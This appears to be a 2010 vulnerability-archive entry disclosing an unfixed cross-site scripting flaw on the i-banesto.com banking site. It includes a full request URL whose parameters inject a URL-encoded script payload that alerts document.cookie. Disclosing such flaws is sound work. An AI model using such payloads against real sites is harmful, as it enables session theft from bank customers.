Security researcher OleMoudi, has submitted on 17/03/2010 a cross-site-scripting (XSS) vulnerability affecting www.i-banesto.com, which at the time of submission ranked 60603 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 06/07/2010. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 17/03/2010 |
Date published: 06/07/2010 |
Fixed? Mail us! | Status: UNFIXED |
Author: OleMoudi |
Domain: www.i-banesto.com |
Category: XSS |
Pagerank: 60603 |
URL: https://www.i-banesto.com/IBanesto/IBanesto/OPCuentasContratacionSinClaves/s.bto?DatosTitularActivo. SEXO=%A0&DatosTitularActivo.NOMBRE=&DatosTitularActivo.APELLIDO1=&DatosTitularActivo.APELLIDO2=&Dato sTitularActivo.TIPDOC=N&DatosTitularActivo.NUMERO_P=&DatosTitularActivo.EMAIL=&DatosTitularActivo.PR EFIJO=&DatosTitularActivo.NUM_TELEFONO=&DatosTitularActivo.PREFIJO2=&DatosTitularActivo.NUM_TELEFONO 2=&clausula=acepto&dse_operationName=OPCuentasContratacionSinClaves&dse_parentContextName=&dse_proce ssorState=initial&dse_nextEventName=start&dse_errorPage=Globales%2FJsp%2FerrorIBanesto1.jsp&NombreOf icina=ibanesto.com&Oficina=1539&Entidad=0030&canalDeComercializacion=016&Etiqueta=00002&DatosdeConta cto.PACK=X&TipoProducto=300&cabeceraPagina=%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%64%6f%63%75%6d %65%6e%74%2e%63%6f%6f%6b%69%65%29%3c%2f%73%63%72%69%70%74%3e&pieDePagina=%3Cscript+src%3D%2Fcastel%2 Flib_js%2FjuaZul.js+language%3Djavascript%3E%3C%2Fscript%3E&SubTipoProducto=007 |
Click here to view the mirror
|
|
|